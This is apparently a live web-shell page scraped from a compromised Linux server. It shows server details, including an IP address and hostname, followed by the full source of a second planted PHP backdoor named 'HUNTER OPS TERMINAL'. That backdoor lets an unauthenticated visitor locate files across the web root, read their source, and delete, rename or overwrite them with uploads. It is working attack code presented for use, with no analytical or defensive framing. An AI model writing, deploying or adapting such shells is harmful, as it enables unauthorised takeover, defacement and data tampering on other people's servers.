403Webshell
Server IP : 162.214.67.83  /  Your IP : 216.73.217.31
Web Server : Apache
System : Linux dedi-13542965.clustter.com.br 5.14.0-687.20.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jun 30 06:22:49 EDT 2026 x86_64
User : jforte ( 1063)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/0eb95b103537a5b95a234a449decc467.php
<?php
set_time_limit(0);

$baseDir = __DIR__;
$baseDirReal = realpath($baseDir);

$baseUrl = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? "https" : "http")
    . "://" . $_SERVER['HTTP_HOST'];

$searchInput = $_GET['files'] ?? "Connection Fail !";
$targets = array_flip(array_map('trim', explode("|", $searchInput)));

$results = [];
$msg = "";

/* VIEW */
$viewCode = "";

if (isset($_GET['view'])) {
    $target = realpath($_GET['view']);
    if ($target && strpos($target, $baseDirReal) === 0 && is_file($target)) {
        $viewCode = htmlspecialchars(file_get_contents($target));
    }
}

/* SCAN */
$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($baseDir, FilesystemIterator::SKIP_DOTS)
);

foreach ($iterator as $file) {
    if ($file->isFile()) {
        $name = $file->getFilename();

        if (isset($targets[$name])) {
            $pathReal = $file->getRealPath();

            $relative = str_replace($baseDirReal, '', $pathReal);
            $relative = str_replace("\\", "/", $relative);
            $relative = '/' . ltrim($relative, '/');

            $results[] = [
                'name' => $name,
                'path' => $pathReal,
                'url'  => rtrim($baseUrl, '/') . $relative
            ];
        }
    }
}

/* DELETE */
if (isset($_POST['delete']) && !empty($_POST['selected'])) {
    foreach ($_POST['selected'] as $file) {
        $safe = realpath($file);
        if ($safe && strpos($safe, $baseDirReal) === 0 && file_exists($safe)) {
            @unlink($safe);
        }
    }
    $msg = "SYSTEM: FILES PURGED";
}

/* RENAME */
if (isset($_POST['rename_submit'])) {
    $old = $_POST['old'] ?? '';
    $new = $_POST['new'] ?? '';

    $oldSafe = realpath($old);

    if ($oldSafe && strpos($oldSafe, $baseDirReal) === 0 && $new) {
        rename($oldSafe, dirname($oldSafe) . "/" . basename($new));
        $msg = "SYSTEM: RENAMED";
    }
}

/* REPLACE */
if (isset($_POST['replace_submit'])) {
    $target = $_POST['target'] ?? '';

    $targetSafe = realpath($target);

    if (
        $targetSafe &&
        strpos($targetSafe, $baseDirReal) === 0 &&
        isset($_FILES['file'])
    ) {
        move_uploaded_file($_FILES['file']['tmp_name'], $targetSafe);
        $msg = "SYSTEM: REPLACED";
    }
}
?>

<!DOCTYPE html>
<html>
<head>
<title>x</title>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">

<style>

/* ===== MATRIX HACKER MODE ===== */

body{
    margin:0;
    font-family:'Share Tech Mono', monospace;
    background:#000;
    color:#00ff66;
    overflow-x:hidden;
}

/* MATRIX RAIN BACKGROUND */
body::before{
    content:"";
    position:fixed;
    inset:0;
    background:
        url("https://i.imgur.com/3ZQ3ZQp.png");
    opacity:0.08;
    pointer-events:none;
}

/* SCANLINE EFFECT */
body::after{
    content:"";
    position:fixed;
    inset:0;
    background: repeating-linear-gradient(
        to bottom,
        rgba(0,255,100,0.05),
        rgba(0,255,100,0.05) 1px,
        transparent 1px,
        transparent 3px
    );
    pointer-events:none;
}

/* container */
.container{
    width:96%;
    margin:20px auto;
}

/* HEADER */
.header{
    display:flex;
    justify-content:space-between;
    align-items:center;

    padding:15px;
    border:1px solid #00ff6633;
    background:rgba(0,0,0,0.7);
    box-shadow:0 0 25px #00ff6633;
}

.logo{
    font-size:18px;
    color:#00ff66;
    text-shadow:0 0 10px #00ff66,0 0 30px #00ff66;
}

/* buttons */
.btn{
    padding:8px 12px;
    border:none;
    cursor:pointer;
    font-size:11px;
    color:#000;
    font-weight:bold;
    transition:0.2s;
}

.btn:hover{
    transform:scale(1.1);
}

.tg{background:#00ff66;}
.del{background:#ff0033;}
.sel{background:#00ccff;}

/* search */
.searchBox{
    width:98%;
    margin:15px 0;
    padding:12px;

    background:#000;
    border:1px solid #00ff66;
    color:#00ff66;

    outline:none;
}

/* table */
table{
    width:100%;
    border-collapse:collapse;
    background:rgba(0,0,0,0.8);
    border:1px solid #00ff6633;
}

th{
    padding:12px;
    background:#001a10;
    color:#00ff66;
    text-transform:uppercase;
}

td{
    padding:10px;
    border-top:1px solid #00ff6633;
    font-size:12px;
}

tr:hover{
    background:#00150a;
}

/* links */
.url{
    color:#00ccff;
}

/* actions */
.actions{
    display:flex;
    gap:6px;
    flex-wrap:wrap;
}

.small{
    padding:6px 10px;
    border:none;
    cursor:pointer;
    font-size:11px;
    font-weight:bold;
}

.view{background:#aa00ff;color:#fff;}
.rename{background:#00ff66;}
.replace{background:#00ccff;}

/* inputs */
input[type="text"],input[type="file"]{
    background:#000;
    border:1px solid #00ff66;
    color:#00ff66;
    padding:5px;
}

/* viewer */
.viewer{
    margin-top:15px;
    padding:15px;
    border:1px solid #00ff6633;
    background:#000;
}

pre{
    color:#00ff66;
}

/* message */
.msg{
    margin:10px 0;
    padding:10px;
    border:1px solid #00ff66;
    background:#001a0a;
    color:#00ff66;
}

/* checkbox */
.chk{
    accent-color:#00ff66;
}

</style>

</head>

<body>

<div class="container">

<div class="header">
    <div class="logo">☠ HUNTER OPS TERMINAL</div>

    <div>
        <a class="btn tg" href="https://t.me/neel_info" target="_blank">LOAD</a>
        <button class="btn sel" onclick="toggleAll()">SELECT</button>
        <button class="btn del" form="mainForm" name="delete">PURGE</button>
    </div>
</div>

<form method="GET">
    <input class="searchBox" name="files" value="<?= htmlspecialchars($searchInput) ?>">
</form>

<?php if($msg): ?>
<div class="msg"><?= $msg ?></div>
<?php endif; ?>

<form method="POST" enctype="multipart/form-data" id="mainForm">

<table>
<tr>
<th></th>
<th>FILE</th>
<th>ACCESS</th>
<th>CONTROL</th>
</tr>

<?php foreach($results as $r): ?>

<tr>

<td><input type="checkbox" class="chk" name="selected[]" value="<?= $r['path'] ?>"></td>

<td><?= htmlspecialchars($r['name']) ?></td>

<td><a class="url" target="_blank" href="<?= $r['url'] ?>"><?= $r['url'] ?></a></td>

<td>

<div class="actions">

<a class="small view" href="?files=<?= urlencode($searchInput) ?>&view=<?= urlencode($r['path']) ?>">VIEW</a>

<form method="POST">
<input type="hidden" name="old" value="<?= $r['path'] ?>">
<input type="text" name="new" placeholder="rename">
<button class="small rename" name="rename_submit">OK</button>
</form>

<form method="POST" enctype="multipart/form-data">
<input type="hidden" name="target" value="<?= $r['path'] ?>">
<input type="file" name="file">
<button class="small replace" name="replace_submit">UPLOAD</button>
</form>

</div>

</td>

</tr>

<?php endforeach; ?>

</table>

</form>

<?php if($viewCode): ?>
<div class="viewer">
<pre><?= $viewCode ?></pre>
</div>
<?php endif; ?>

</div>

<script>
function toggleAll(){
    let c = document.querySelectorAll('.chk');
    let all = [...c].every(x => x.checked);
    c.forEach(x => x.checked = !all);
}
</script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit